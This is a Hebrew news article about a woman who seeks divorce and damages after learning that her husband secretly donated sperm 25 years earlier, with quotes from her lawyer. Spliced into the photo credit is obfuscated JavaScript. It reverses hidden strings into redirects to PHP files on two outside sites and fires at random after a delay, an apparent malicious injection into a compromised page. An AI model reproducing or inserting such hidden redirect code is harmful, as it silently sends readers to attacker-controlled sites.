fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

מבקשת להתגרש: בעלי תרם זרע והסתיר זאת ממני במשך 25 שנה

הבעל תרם זרע בהיותו סטודנט, כשכבר היה בקשר זוגי עם אשתו הנוכחית. האישה מרגישה נבגדת מאחר שהסתיר זאת ממנה במשך יותר משני עשורים
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

תרומת זרע עומדת במבחן זוגיות קשה. מדובר בבני זוג שנשואים כבר 25 שנים. לאחרונה, התוודה הבעל בפני אשתו, כי לפני חתונתם תרם זרע, והאישה מבקשת כעת להגיש נגדו תביעת פיצויים ולהתגרש.

לפני כמה ימים התייצבה האישה במשרדה של עו"ד שרין סולן וביקשה להגיש נגד בעלה תביעה בדרישה לפיצויי נזיקין לצד כוונתה להתגרש ממנו.

האישה אמרה לעו"ד סולן: "הוא בגד בי ובאמון שלי", ובתצהיר שהגישה היא טוענת כי בעלה התוודה רק לאחרונה כי בהיותו סטודנט, ובקשר זוגי איתה, כמה חודשים לפני שנישאו, הוא תרם זרע לבנק הזרע, כדי לאפשר לנשים אחרות להרות.

עו"ד שרין סולן | צילום: יח"צ

לדברי האישה, כך נימק הבעל את החלטתו לתרום זרע: "חשבתי שזה נכון אז, כי הייתי זקוק לכסף, ובנוסף, אני חושב שמי שיכול לעשות זאת, שיעשה ולא יהסס".

עוד אמרה האישה לעו"ד סולן, כי אינה יכולה לחיות עוד במחיצת בעלה. "המעשה הזה, גם אם נעשה, היה צריך להיות מדווח בזמן אמת, ואז הייתי צריכה לקבל את ההחלטה האם נכון לי להמשיך בקשר. ברגע שהמעשה הזה הוסתר ממני ומילדינו במשך 25 שנים – זוהי בגידה לכל דבר ועניין".

בינתיים, מנסים עורכי הדין של הצדדים להוביל את בני הזוג לסוג של גישור שימנע גירושים, אולם עד כה הדבר לא עולה בידיהם.

עו"ד סולן הדגישה כי האישה זועמת בעיקר על ההסתרה ומרגישה פגועה, נבגדת ומתקשה להבליג על המעשה.

חדשות נוספות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות